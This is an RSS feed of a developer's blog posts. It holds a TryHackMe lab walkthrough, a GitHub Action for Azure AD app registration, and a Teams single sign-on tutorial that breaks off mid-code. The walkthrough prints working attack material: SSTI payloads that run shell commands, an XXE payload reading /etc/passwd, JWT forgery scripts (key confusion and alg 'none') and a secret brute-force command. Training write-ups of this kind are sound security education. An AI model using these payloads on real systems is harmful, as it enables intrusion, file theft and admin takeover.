<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Tobias Urban</title>
    <description>The latest articles on Forem by Tobias Urban (@urmade).</description>
    <link>https://forem.com/urmade</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F151001%2Fef558875-fa0b-43c0-aede-cfd4da60145a.jpeg</url>
      <title>Forem: Tobias Urban</title>
      <link>https://forem.com/urmade</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/urmade"/>
    <language>en</language>
    <item>
      <title>Write-Up: TryHackMe Web Fundamentals - ZTH: Obscure Web Vulns</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Wed, 05 Jan 2022 08:42:25 +0000</pubDate>
      <link>https://forem.com/urmade/write-up-tryhackme-web-fundamentals-zth-obscure-web-vulns-bfe</link>
      <guid>https://forem.com/urmade/write-up-tryhackme-web-fundamentals-zth-obscure-web-vulns-bfe</guid>
      <description>&lt;h1&gt;
  
  
  Write-Up: TryHackMe Web Fundamentals - ZTH: Obscure Web Vulns
&lt;/h1&gt;

&lt;blockquote&gt;
&lt;p&gt;This is a walkthrough through the &lt;a href="https://tryhackme.com/room/zthobscurewebvulns"&gt;TryHackMe course&lt;/a&gt; on Obscure Web Vulnerabilities and aims to provide help for learners who get stuck on certain parts of the course.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Agenda
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Section 1: SSTI&lt;/li&gt;
&lt;li&gt;Section 2: CSRF&lt;/li&gt;
&lt;li&gt;Section 3: JWT Algorithm vulnerability&lt;/li&gt;
&lt;li&gt;Section 3.5: JWT header vulnerability&lt;/li&gt;
&lt;li&gt;Section 4: XXE&lt;/li&gt;
&lt;li&gt;Bonus Section: JWT Brute-Forcing&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Section 1: SSTI
&lt;/h2&gt;

&lt;p&gt;This walkthrough takes the manual approach to retrieving the flag. &lt;/p&gt;

&lt;p&gt;When you connect to the demo application, you can check whether the site is vulnerable to SSTI attacks by typing in &lt;code&gt;{{3+3}}&lt;/code&gt;. If the site returns &lt;code&gt;6&lt;/code&gt; instead of the literal &lt;code&gt;{{3+3}}&lt;/code&gt;, you know that the page interpreted your statement.&lt;/p&gt;
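&lt;p&gt;The check above can be wrapped in a tiny helper. This is an illustrative sketch (not part of the course): it only inspects the text the page echoes back, so you can pair it with whatever HTTP client you like:&lt;/p&gt;

```python
def looks_evaluated(echoed: str, payload: str = "{{3+3}}", expected: str = "6") -> bool:
    """Return True if the page rendered the result instead of the literal payload."""
    return expected in echoed and payload not in echoed

# A page echoing "6" suggests the template engine evaluated our expression:
looks_evaluated("Hello 6")        # likely vulnerable
looks_evaluated("Hello {{3+3}}")  # payload reflected literally, likely not vulnerable
```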

&lt;p&gt;Now that we know we can inject statements, let's use this to read out the hidden flag. As specified in the challenge, the flag is stored under &lt;code&gt;/flag&lt;/code&gt;, so all we have to do is read out the file with the command provided:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;{{ ''.__class__.__mro__[2].__subclasses__()[40]('/flag').read() }}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;or via command line injection:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;P.S.: If you want to look up other injections, read through the &lt;a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#basic-injection"&gt;provided repository&lt;/a&gt;. This project uses the Jinja2 templating engine.&lt;/p&gt;

&lt;h2&gt;
  
  
  Section 2: CSRF
&lt;/h2&gt;

&lt;p&gt;This section does not have an actual challenge, but it requires you to get familiar with the &lt;code&gt;xsrfprobe&lt;/code&gt; tool. You could either install it on your device and use &lt;code&gt;xsrfprobe --help&lt;/code&gt; to find the right argument for generating a PoC, or use the &lt;a href="https://github.com/0xInfection/XSRFProbe/wiki/General-Usage"&gt;official documentation&lt;/a&gt; on the web. Hint: Find out which command would let you craft an actual, malicious request.&lt;/p&gt;

&lt;p&gt;For the practical "challenge", you could build a simple website that authenticates users via a GET request and stores the session in a cookie. Then, from another page, try to GET your existing page and observe in the network traffic that this second page can make authenticated requests on behalf of your user.&lt;/p&gt;
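&lt;p&gt;To illustrate the idea, here is a hedged sketch of the kind of auto-submitting PoC page such a tool generates; the target URL and field names are made up:&lt;/p&gt;

```python
def csrf_poc(action_url: str, fields: dict) -> str:
    """Build an auto-submitting HTML form that fires a forged GET request."""
    inputs = "\n".join(
        f'  <input type="hidden" name="{name}" value="{value}">'
        for name, value in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'<form action="{action_url}" method="GET">\n{inputs}\n</form>\n'
        "</body></html>"
    )

# Hosted on the attacker's page, the victim's browser submits the form
# automatically, sending its session cookie along with the request:
poc = csrf_poc("https://victim.example/transfer", {"to": "attacker", "amount": "100"})
```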

&lt;h2&gt;
  
  
  Section 3: JWT Algorithm vulnerability
&lt;/h2&gt;

&lt;p&gt;This is probably the toughest section in this whole room, so don't get frustrated if it takes several tries to get it done!&lt;/p&gt;

&lt;p&gt;To recap the exploit: the basic idea is to take a token that was signed with RS256 (and therefore with a secret, hidden private key) and transform it into a token signed with HS256, which uses a symmetric shared secret. If the receiving application doesn't differentiate between RS256 and HS256 and verifies HS256 signatures with the same key material it publishes for RS256, the public key effectively becomes the shared secret. Since that key is public, we can forge any token and trick the system into believing it is legit.&lt;/p&gt;

&lt;p&gt;As every token issued in the lab has a lifetime of only two minutes, you will have to complete all steps necessary in that timeframe. I would recommend preparing the "static" parts and then getting a new token and running through all "token-specific" steps.&lt;/p&gt;

&lt;p&gt;First of all, you will need to fetch and prepare the public key. You can download it under &lt;code&gt;/public&lt;/code&gt;, and once you have downloaded it you can convert the key into HEX using this command (in a UNIX/Bash shell):&lt;/p&gt;

&lt;p&gt;&lt;code&gt;cat ./public.pem | xxd -p | tr -d "\\n"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Copy and paste the resulting string as we'll need that in a bit!&lt;/p&gt;

&lt;p&gt;Next up, let's look at the JWT itself. If you take the token the lab prepared for you and parse it (for example by pasting it into &lt;a href="https://jwt.io"&gt;jwt.io&lt;/a&gt;), you will see a header which specifies that RS256 was used for the signature. What you want to do is create a new token header which specifies HS256 instead. You can do this right in jwt.io by changing "RS256" to "HS256". Note that this part is the same for all tokens we will generate, so you can copy it out; the first third of our token is ready!&lt;/p&gt;

&lt;p&gt;Now you should have a really long string representing your public key in HEX, as well as a Base64-encoded string representing your token header. All that is left now is re-generating the signature and crafting the final JWT. To create the new hash, the room already gives us the right command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.your-token-body" | openssl dgst -sha256 -mac HMAC -macopt hexkey:your-key-in-hex&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;your-key-in-hex&lt;/code&gt; is the same for every token we will generate, so the only token-specific info we need to inject is the body of our current token (you don't need to change anything here, but every token will have a slightly different body). This should give you another HEX string: our new signature.&lt;/p&gt;

&lt;p&gt;In order to fit into our JWT, we need that hash in a Base64 format, though. Make sure you have Python installed on your device and run the following command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;python3 -c "import base64, binascii; print(base64.urlsafe_b64encode(binascii.a2b_hex('hash-from-last-step')).decode().replace('=',''))"&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now we just put everything back together and we have our finalised token. It should look something like this:&lt;br&gt;
&lt;code&gt;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.payload-from-original-JWT.Hash-from-last-step&lt;/code&gt;&lt;/p&gt;
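&lt;p&gt;The manual steps above can also be condensed into a short Python sketch. Note that the HEX conversion only exists because &lt;code&gt;openssl&lt;/code&gt; expects a &lt;code&gt;hexkey&lt;/code&gt;; an HMAC library can consume the raw bytes of &lt;code&gt;public.pem&lt;/code&gt; directly. The file name and payload below are placeholders:&lt;/p&gt;

```python
import base64
import hashlib
import hmac

def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_hs256(payload_b64: str, public_key_pem: bytes) -> str:
    # Header declaring HS256 instead of RS256 (identical for every token).
    header_b64 = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9"
    signing_input = f"{header_b64}.{payload_b64}".encode()
    # The trick: use the server's RSA *public* key bytes as the HMAC secret.
    signature = hmac.new(public_key_pem, signing_input, hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{b64url(signature)}"

# 'payload_b64' would be the middle segment of the token the lab issued:
# token = forge_hs256(payload_b64, open("public.pem", "rb").read())
```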
&lt;h2&gt;
  
  
  Section 3.5: JWT header vulnerability
&lt;/h2&gt;

&lt;p&gt;To get started, sign in with any account and find the JWT token securing your session in the cookies (the cookie is called "token"). Copy that JWT token and paste it into &lt;a href="https://jwt.io"&gt;jwt.io&lt;/a&gt;. In your payload, you will see an attribute "role"; set its value to "admin". &lt;/p&gt;

&lt;p&gt;Right now though, the token would be invalid, as the signature doesn't match the token anymore. Therefore we also have to change the header and specify that the token shouldn't have a signature altogether. As jwt.io won't let you change the header of a token, just replace the current header with &lt;code&gt;eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0&lt;/code&gt;. Decode this Base64 string to make sure you understand what we are doing here. &lt;/p&gt;

&lt;p&gt;Now put your token back together, which should look something like this: &lt;code&gt;eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.new-body-with-role:admin.&lt;/code&gt;&lt;br&gt;
(Please note the trailing &lt;code&gt;.&lt;/code&gt;. You will need this in order to create a valid JWT token)&lt;/p&gt;
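&lt;p&gt;The assembly above can be sketched in a few lines of Python; the payload fields are hypothetical, as the real ones come from your own cookie:&lt;/p&gt;

```python
import base64
import json

def b64url_json(obj) -> str:
    """Serialize to compact JSON, then base64url-encode without padding."""
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def unsigned_token(payload: dict) -> str:
    header = {"typ": "JWT", "alg": "none"}
    # Note the trailing dot: an empty third segment where the signature would go.
    return f"{b64url_json(header)}.{b64url_json(payload)}."

token = unsigned_token({"username": "guest", "role": "admin"})
```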

&lt;p&gt;Copy that new token and replace your current "token" cookie with that new JWT token. If you now re-load the page you should be signed in as an admin!&lt;/p&gt;
&lt;h2&gt;
  
  
  Section 4: XXE
&lt;/h2&gt;

&lt;p&gt;Make sure you have Burp Suite, OWASP ZAP or a similar tool installed for this challenge, as we will have to change the request structure in order to complete it.&lt;/p&gt;

&lt;p&gt;When you open the form, submit it with some random values. Give each field a unique value so that you can easily see which value is echoed in the page's output. This should reveal that the value of the email field is posted to the page, so this is the value we'll look at more closely. Make another request and intercept it in your tool of choice so we can modify the payload.&lt;/p&gt;

&lt;p&gt;In the challenge, we are asked how many users exist on the target server and which user has the specific ID "1000". Remember that the "/etc/passwd" file keeps track of every single user in the system and also references the unique user ID, so this file is all we really need.&lt;/p&gt;

&lt;p&gt;First off, we need to define a new XML external entity that we can display in the email field. In this challenge we are interested in the "/etc/passwd" file of the server. Define the entity like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!DOCTYPE data [ &amp;lt;!ELEMENT data ANY&amp;gt; 
&amp;lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &amp;gt;]&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and reference it like this:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&amp;lt;email&amp;gt;&amp;amp;xxe;&amp;lt;/email&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Your full payload should look like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;!DOCTYPE data [ &amp;lt;!ELEMENT data ANY&amp;gt; 
&amp;lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;
&amp;lt;name&amp;gt;aa&amp;lt;/name&amp;gt;
&amp;lt;tel&amp;gt;aa&amp;lt;/tel&amp;gt;
&amp;lt;email&amp;gt;&amp;amp;xxe;&amp;lt;/email&amp;gt;
&amp;lt;password&amp;gt;aa&amp;lt;/password&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Sending the request with this modified payload should reveal the "passwd" file. Copy it into a text editor for easier reading, count the entries (each line is an entry) to get the number of users, and search for the user with the ID "1000".&lt;/p&gt;
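&lt;p&gt;The counting step can be scripted as well. The sample content below is made up; paste the real output of the request in its place:&lt;/p&gt;

```python
# Each /etc/passwd line has seven colon-separated fields; the third is the UID.
sample_passwd = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
falcon:x:1000:1000::/home/falcon:/bin/bash"""

entries = [line.split(":") for line in sample_passwd.strip().splitlines()]
user_count = len(entries)                                 # one entry per line
uid_1000 = next(e[0] for e in entries if e[2] == "1000")  # username with UID 1000
```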

&lt;h2&gt;
  
  
  Bonus Section: JWT Brute-Forcing
&lt;/h2&gt;

&lt;p&gt;This section is really straightforward. Install the &lt;code&gt;jwt-cracker&lt;/code&gt; tool on your device and then run &lt;code&gt;jwt-cracker eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4&lt;/code&gt; to crack the secret. &lt;/p&gt;

&lt;p&gt;We know from the answer pattern that we're looking for a string with 4 characters, so make sure to specify this number, as otherwise the tool will try up to 26^12 combinations instead of 26^4 combinations, which is a lot more! (You do the math, but not specifying the secret length results in 26^8, roughly 200 billion, times more operations; put differently, you'll spend quite some time staring at your screen.)&lt;/p&gt;
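&lt;p&gt;The search-space arithmetic is quick to verify:&lt;/p&gt;

```python
full_space = 26 ** 12    # maximum secret length tried without the hint
known_length = 26 ** 4   # the secret is known to be 4 lowercase letters
ratio = full_space // known_length  # 26**8 = 208,827,064,576
```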

&lt;h1&gt;
  
  
  Wrap-Up
&lt;/h1&gt;

&lt;p&gt;I hope this write-up could help you understand some of the more complicated parts of this lab. If you have any feedback, questions or suggestions, please leave a comment under this post!&lt;/p&gt;

</description>
      <category>tryhackme</category>
      <category>hacking</category>
      <category>security</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Azure Active Directory Application Creator</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Mon, 24 Aug 2020 10:13:36 +0000</pubDate>
      <link>https://forem.com/urmade/azure-active-directory-application-creator-3m8m</link>
      <guid>https://forem.com/urmade/azure-active-directory-application-creator-3m8m</guid>
      <description>&lt;h3&gt;
  
  
  Azure Active Directory Application Creator
&lt;/h3&gt;

&lt;h3&gt;
  
  
  Submission Category: DIY Deployments
&lt;/h3&gt;

&lt;h3&gt;
  
  
  Project:
&lt;/h3&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--566lAguM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/urmade"&gt;
        urmade
      &lt;/a&gt; / &lt;a href="https://github.com/urmade/AAD_Service-Principal_Action"&gt;
        AAD_Service-Principal_Action
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      GitHub Action to create a new Azure Active Directory Service Principal within your workflow.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;h1&gt;
GitHub Action to create new Application registrations in Azure Active Directory&lt;/h1&gt;
&lt;p&gt;This action enables you to automate the creation of Azure Active Directory applications in order to test your Graph-powered or Single Sign-On enabled application.&lt;/p&gt;
&lt;h2&gt;
How to use&lt;/h2&gt;
&lt;p&gt;In order to generate new applications automatically, you need an existing application that the tenant administrator has granted the Application.ReadWrite.All scope.&lt;/p&gt;
&lt;p&gt;Mandatory parameters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;adminApplicationId: Client ID of an existing application with the Application.ReadWrite.All scope&lt;/li&gt;
&lt;li&gt;adminApplicationSecret: Client secret of the same existing application with the Application.ReadWrite.All scope&lt;/li&gt;
&lt;li&gt;tenantId: ID of the tenant in which the new application should be created&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Optional parameters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;applicationName: Any string, is set as the name of the application and displayed to users on sign-in&lt;/li&gt;
&lt;li&gt;redirectUrl: A list of URLs that should be registered as redirect URLs (Format: "URL,URL,URL")&lt;/li&gt;
&lt;li&gt;logoutUrl: A single URL that should be registered as the logout URL&lt;/li&gt;
&lt;li&gt;allowImplicitIdToken: Boolean indicator if the ID token acquisition…&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/urmade/AAD_Service-Principal_Action"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;


&lt;h3&gt;
  
  
  Additional Resources / Info
&lt;/h3&gt;

&lt;p&gt;This tool aims to automate the rollout process (currently only in testing environments) for Azure Active Directory Service Principals. This enables a smoother DevOps experience when developing in the Microsoft Office ecosystem, where one may want to test the rollout experience in a more automated way.&lt;/p&gt;

</description>
      <category>actionshackathon</category>
    </item>
    <item>
      <title>Seamless SSO login for Microsoft Teams Tabs</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sun, 17 Nov 2019 13:17:44 +0000</pubDate>
      <link>https://forem.com/urmade/seamless-sso-login-for-microsoft-teams-tabs-3n8k</link>
      <guid>https://forem.com/urmade/seamless-sso-login-for-microsoft-teams-tabs-3n8k</guid>
      <description>&lt;h1&gt;
  
  
  Maximize security AND user experience
&lt;/h1&gt;

&lt;p&gt;Until now, it was only possible to build authentication in Microsoft Teams tabs via the following flow: You spawn a popup, the user manually authenticates, and then (best case) you store some sort of session token in the user's local storage so that you don't have to re-authenticate the user every time they want to use your tab. In the end, you had to take care of building the popup flow, managing sessions for your users, and deciding how frequently you want to re-authenticate the user to make sure they are still in a safe context.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to build a secure and seamless experience
&lt;/h2&gt;

&lt;p&gt;In a nutshell, you only need three things to implement a simple Single Sign-On mechanism in Teams: an Azure Active Directory App registration, a Teams manifest and an HTML page that hosts less than 10 lines of JavaScript. You can find a complete implementation of this in &lt;a href="https://github.com/Urmade/TeamsTabSSO"&gt;this GitHub repository&lt;/a&gt;. Let's start with Azure Active Directory.&lt;/p&gt;

&lt;h3&gt;
  
  
  Configuring an App registration
&lt;/h3&gt;

&lt;p&gt;When acquiring a token for your user, Teams uses the so-called OAuth2 on-behalf-of flow. This means: users use your app and consent to your app accessing their data. Your app then delegates to a second app (managed by Microsoft; for simplicity it is referenced as &lt;em&gt;Microsoft App&lt;/em&gt; throughout this tutorial) and allows that app to access everything that your app can access. The Microsoft App then acquires a new token (in your name) and returns you only an id_token, which is then exposed to the Teams client. &lt;/p&gt;

&lt;p&gt;Why do it this way? For one, you don't have to care about implementing this whole flow yourself. The Microsoft App runs on a server that handles token acquisition, whilst you can sit back and wait for a token to return. Another nice side effect is that Microsoft automatically filters the answer it gets back from Azure Active Directory when it acquires the user token, and only gives you an id_token. This token already contains information about the user, but it cannot be used to make requests against any other service. The token is therefore worthless beyond the information it itself contains, minimizing the attack surface on the user's client.&lt;br&gt;
Secondly, it is a more secure flow whilst enabling great flexibility. Usually, when you want to receive any user tokens directly in the browser, you have to provide a client_id and a client_secret to the client. With these two values, basically everyone else could acquire tokens in your name as well. With the on-behalf-of flow, Teams only knows the client_id (and even that only through the manifest), and the Microsoft App can identify it and acquire a token with its own, hidden id and secret.&lt;/p&gt;

&lt;p&gt;But how do we actually register an App to work with Teams Single Sign On? &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The process consists of basically three steps: telling Azure Active Directory that we want to have an application, giving it the permissions to read the user's profile, and opening this application to the &lt;em&gt;Microsoft App&lt;/em&gt; so that it can access the user's profile on our behalf. &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The process is well-documented in &lt;a href="https://docs.microsoft.com/en-us/microsoftteams/platform/tabs/how-to/authentication/auth-aad-sso#1-create-your-aad-application-in-azure"&gt;this article&lt;/a&gt;, and you can find a step-by-step tutorial right here: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Head to &lt;a href="https://portal.azure.com"&gt;https://portal.azure.com&lt;/a&gt; and log in with your credentials.&lt;/li&gt;
&lt;li&gt;Search for &lt;strong&gt;Azure Active Directory&lt;/strong&gt; and select it.&lt;/li&gt;
&lt;li&gt;On the AAD Dashboard, click on &lt;strong&gt;App registrations&lt;/strong&gt; in the left-hand navigation.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;New registration&lt;/strong&gt; in the top navigation bar.

&lt;ol&gt;
&lt;li&gt;Give it a name that people understand. It will eventually be shown to them whilst using your app.&lt;/li&gt;
&lt;li&gt;In &lt;strong&gt;Supported Account types&lt;/strong&gt; go for &lt;strong&gt;Accounts in any organizational directory&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Leave the &lt;strong&gt;Redirect URI&lt;/strong&gt; blank.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;Register&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;


&lt;/li&gt;
&lt;li&gt;In your newly created app, click on &lt;strong&gt;Expose an API&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;On &lt;strong&gt;Application ID URI&lt;/strong&gt;, click on &lt;strong&gt;Set&lt;/strong&gt;. The URI must have the following structure: api://&lt;em&gt;yourendpoint&lt;/em&gt;/&lt;em&gt;client_id&lt;/em&gt;. For example: api://mydomain.com/00000000-0000-0000-0000-000000000000.&lt;/li&gt;
&lt;li&gt;Next, click on &lt;strong&gt;Add a scope&lt;/strong&gt;. Give it the scope name &lt;strong&gt;access_as_user&lt;/strong&gt;, make it consentable by users and admins and give it a display name and description that is understandable for your users. Make sure its State is &lt;strong&gt;enabled&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;Add a client application&lt;/strong&gt;. &lt;/li&gt;
&lt;li&gt;Give the following client_ids access to your API: &lt;strong&gt;5e3ce6c0-2b1f-4285-8d4b-75ee78787346&lt;/strong&gt; and &lt;strong&gt;1fec8e78-bce4-4aaf-ab1b-5451cc387264&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;On the left-hand navigation, click on &lt;strong&gt;API permissions&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Click on &lt;strong&gt;Add a permission&lt;/strong&gt;, then &lt;strong&gt;Microsoft Graph&lt;/strong&gt;, &lt;strong&gt;Delegated permissions&lt;/strong&gt; and select &lt;em&gt;email&lt;/em&gt;, &lt;em&gt;offline_access&lt;/em&gt;, &lt;em&gt;openid&lt;/em&gt; and &lt;em&gt;profile&lt;/em&gt;. Click on &lt;strong&gt;Add permissions&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Here you go, you have everything in place with Azure Active Directory to receive Single-Sign-On tokens!&lt;/p&gt;

&lt;h3&gt;
  
  
  Creating a Teams app manifest
&lt;/h3&gt;

&lt;p&gt;Basically all you have to do to enable SSO in your Teams tabs is to specify your API endpoint in the Teams manifest. &lt;/p&gt;

&lt;p&gt;To register a Teams application with a basic tab, you can follow &lt;a href="https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/build-and-test/app-studio-overview"&gt;this article&lt;/a&gt; as a starting point. There is only one additional step to configure Single Sign-On: In App Studio, go to &lt;strong&gt;Domains and Permissions&lt;/strong&gt; and click on &lt;strong&gt;Set up&lt;/strong&gt; under &lt;strong&gt;Web App single sign-on&lt;/strong&gt;. Here you have to provide the client ID that you got from the AAD app registration as well as the resource URL you specified (in AAD, it was called &lt;em&gt;Application ID URI&lt;/em&gt;, e.g. api://mydomain.com/00000000-0000-0000-0000-000000000000). That is all you have to do! If you want to configure these properties right in the manifest.json, you can follow &lt;a href="https://docs.microsoft.com/en-us/microsoftteams/platform/tabs/how-to/authentication/auth-aad-sso#2-update-your-microsoft-teams-application-manifest"&gt;this documentation&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Getting your single sign-on token
&lt;/h3&gt;

&lt;p&gt;Now that all setup steps are done, you can implement the actual single sign-on in the tab. This can be done in just a few lines of code:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.initialize();
var authTokenRequest = {
    successCallback: function (result) {console.log(result)},
    failureCallback: function (error) {console.log(error)}
};
microsoftTeams.authentication.getAuthToken(authTokenRequest);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;code&gt;result&lt;/code&gt; will contain the id_token with the user's information. This is a JSON Web Token and can be decoded using various JWT libraries. The token contains the name, mail address and AAD ID of the user. If you only need this information, you are now officially done! &lt;/p&gt;
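&lt;p&gt;For illustration, here is a minimal, library-free sketch (in Python for brevity, though the tab itself runs JavaScript) of reading the claims out of such a token. It does not verify the signature, so treat the result as untrusted input:&lt;/p&gt;

```python
import base64
import json

def jwt_payload(token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore base64 padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Well-known demo token from jwt.io, not a real Teams id_token:
demo = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
        "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
        "signature-ignored")
claims = jwt_payload(demo)
```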

&lt;h2&gt;
  
  
  Limitations and workarounds
&lt;/h2&gt;

&lt;p&gt;This new mechanism is optimized around giving you quick, seamless and verified information about who is using your application. In OAuth2 terms, it &lt;em&gt;authenticates&lt;/em&gt; your user (if your app uses Azure Active Directory as the identity control plane). This leaves some use cases open where you still have to implement workarounds.&lt;/p&gt;

&lt;h3&gt;
  
  
  Your app must use Azure Active Directory as its Identity provider
&lt;/h3&gt;

&lt;p&gt;This flow only works for returning the Azure Active Directory information about a user. If your app has its own identity provider, you can't use this Single Sign-On flow to authenticate your users. There is of course a way to still authenticate them, but you are responsible for doing this, and it usually involves a popup asking your users to log in manually. You can check out &lt;a href="https://dev.to/urmade/building-a-microsoft-teams-connector-2bhp#securing-the-connector-adding-authentication"&gt;this article&lt;/a&gt; if you want to learn more about how to build such a mechanism.&lt;/p&gt;

&lt;h3&gt;
  
  
  You cannot make any further requests with the token
&lt;/h3&gt;

&lt;p&gt;In the process, you get an id_token returned. This token is only used to provide information about the user and cannot be used for &lt;em&gt;authorization&lt;/em&gt;, meaning it won't give you access to any other confidential data that you could ask for from Azure Active Directory. In fact, the SSO mechanism only implements half of the on-behalf-of OAuth2 flow. The Microsoft App gives you a token that contains data that was accessed in the name of your app, but you still have to convert it into a token that can make additional requests, as only then is it truly &lt;em&gt;your&lt;/em&gt; app that is accessing that data.&lt;/p&gt;

&lt;p&gt;Converting a token that another app has acquired for you into a token that you got yourself is well documented in &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-on-behalf-of-flow#service-to-service-access-token-request"&gt;this article&lt;/a&gt;. A very simple implementation could look like this: when you get the token from the client, send it to your tab backend.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;fetch("/storeToken?token=" + result)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;In your backend (we're using TypeScript in this example) you can then trade the id_token for an access_token by following the OAuth2 specification. The most important value is the client_secret that verifies that you are the actual owner of this app who is allowed to make requests against Azure Active Directory / Microsoft Graph.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;app.get("/storeToken", (req,res) =&amp;gt; {&lt;br&gt;
const idToken = req.query.token;&lt;br&gt;
request("&lt;a href="https://login.microsoftonline.com/common/oauth2/v2.0/token"&gt;https://login.microsoftonline.com/common/oauth2/v2.0/token&lt;/a&gt;", {&lt;br&gt;
    "method": "POST",&lt;br&gt;
    "headers": {&lt;br&gt;
        "Content-Type": "application/x-www-form-urlencoded"&lt;br&gt;
    },&lt;br&gt;
    "form": {&lt;br&gt;
